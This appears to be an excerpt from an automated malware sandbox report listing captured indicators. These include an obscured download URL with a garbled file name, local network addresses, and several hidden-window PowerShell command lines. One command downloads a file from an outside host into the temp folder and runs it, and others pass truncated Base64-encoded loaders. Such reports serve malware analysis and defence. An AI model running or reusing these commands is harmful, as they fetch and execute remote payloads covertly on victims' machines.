Technical Information
- http://19#.##8.3.27:8080/1.pdf as %temp+/lnkг¦–‡г¤в»в¶г¦в вјгґвјвџгёв§вјг¦žвђ(г¤вїв®г¦в№г§‰ˆ%
- '<LOCALNET>.3.27':8080
- '<LOCALNET>.1.103':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://19#.##8.3.27:8080/1.pdf',$env:temp+'/LNKГ¦–‡Г¤В»В¶Г¦В ¼å¼è§£æžВђ(ä¿®æ”В№Г§‰ˆ).pdf');Start-Process $env:temp'/L...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -s -NoLogo -NoProfile